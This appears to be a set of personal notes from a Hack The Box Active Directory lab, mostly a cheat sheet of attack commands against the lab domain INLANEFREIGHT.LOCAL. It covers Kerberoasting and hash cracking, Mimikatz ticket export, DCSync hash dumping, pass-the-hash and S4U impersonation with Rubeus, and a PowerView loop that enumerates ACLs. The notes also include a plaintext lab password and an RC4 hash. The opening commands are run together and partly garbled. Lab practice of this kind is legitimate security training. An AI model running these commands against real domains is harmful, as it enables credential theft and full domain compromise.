# Request 1 TicketGetUsersSPNs.py-dc-ip<ip><domain/<user>-request-user<username># Request All TicketsGetUsersSPNs.py-dc-ip<ip><domain/<user--request# Save to OutputGetUserSPNs.py-dc-ip<ip>INLANEFREIGHT.LOCAL/forend-request-usersqldev-outputfilesqldev_tgs# Crack TGS Tickethashcat-m13100file.tgs $ROCKYOU
# Enable Base64 Output
base64 /out:true
# Export Tickets
kerberos::list /export
# Modify To Better Format
echo "<base64 blob>" | tr -d \\n
# Output To John Format
cat encoded_file | base64 -d > sqldev.kirbi
# Make to John Format
python2.7 kirbi2john.py sqldev.kirbi
# HashCat Way, Modify to hashcat format
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/'
PowerView
# Import Module
Import-Module .\PowerView.ps1
# List Users With SPN
Get-DomainUser * -spn | select samaccountname
# Target Single User + Hashcat Output
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
Rubeus
# /Stats
.\Rubeus.exe kerberoast /stats
# List Admin Privileges Users for Kerberoasting
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
Double Hop Workarounds
Method 1: PSCredential Object
# Set password
$SecPassword = ConvertTo-SecureString '0xF0rk123!' -AsPlainText -Force
# Set Proper Login
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)
# Use Command with Credentials
get-domainuser -spn -credential $Cred | select samaccountname
# Once Intercepted, we need to renew the ticket
.\Rubeus.exe renew /ticket:<base64> /ptt
4 DcSync
# Since we haveTicket from dc01 and can dump all the hashes
lsadump::dcsync
5 Using NT Hash
# With DCSync, we are able to get all the hashes, we use the administrator hash to askTGT
.\Rubeus.exe asktgt /rc4:<NT-Hash> /user:<user> /ptt
# Perform Actions on DC01
dir \\dc01.inlanefreight.local\c$
# import the PowerView module
Import-Module C:\Tools\PowerView.ps1
# get all computers in the domain
$computers = Get-DomainComputer
# get all users in the domain
$users = Get-DomainUser
# define the required access rights
$accessRights = "GenericWrite","GenericAll","WriteProperty","WriteDacl"
# loop through each computer in the domain
foreach ($computer in $computers) {
# get the security descriptor for the computer
$acl = Get-ObjectAcl -SamAccountName $computer.SamAccountName -ResolveGUIDs
# loop through each user in the domain
foreach ($user in $users) {
# check if the user has the required access rights on the computer object
$hasAccess = $acl | ?{$_.SecurityIdentifier -eq $user.ObjectSID} | %{($_.ActiveDirectoryRights -match ($accessRights -join '|'))}
if ($hasAccess) {
Write-Output "$($user.SamAccountName) has the required access rights on $($computer.Name)"
}
}
}
# /altservice:host,RPCSS,wsman,http,ldap,krbtgt,winrm
.\Rubeus.exe s4u /user:HACKTHEBOX$ /rc4:CF767C9A9C529361F108AA67BF1B3695 /impersonateuser:administrator /msdsspn:cifs/dc01.inlanefreight.local /ptt
# Connect to DC
ls \\dc01.inlanefreight.local\c$
Pass-the-Ticket takes the user's Ticket Granting Ticket (TGT) or Ticket Granting Service (TGS) Ticket. The TGT is a signed ticket that contains a list of privilege levels. This TGT is passed to the Domain Controller, which will grant the TGS Ticket that can be used to access machines. Stealing either of these tickets makes it possible to perform lateral movement.